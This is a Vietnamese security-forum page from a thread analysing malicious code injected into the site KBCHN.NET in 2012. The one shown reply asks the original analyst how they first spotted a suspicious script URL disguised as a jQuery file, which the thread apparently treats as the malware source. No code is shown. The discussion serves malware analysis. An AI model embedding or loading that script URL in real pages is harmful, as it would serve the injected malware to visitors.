miyumi2
Member
|
|
0 |
|
|
Joined: 11/03/2012 15:33:55
Messages: 57
Offline
|
|
|
|
| [Analyzing] Trang KBCHN.NET bị chèn mã độc (28/3/2012) |
29/03/2012 22:39:44 (+0700) | #28 | 260329 |
![[Avatar]](/hvaonline/images/avatar/da23de5810e335573c5e0905de70b461.png "[Avatar]")
|
chiro8x
Member
|
|
0 |
|
|
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
|
|
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình . Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1.
Ý của mình là, duyên cớ nào bạn để ý tới :
http://daily.us.to/js/jquery.php
Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?. |
|
| while(1){} |
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận virus, trojan, spyware, worm...
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[WWW]](/hvaonline/templates/viet/images/icon_www.gif "[www]"){kind=icon}
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")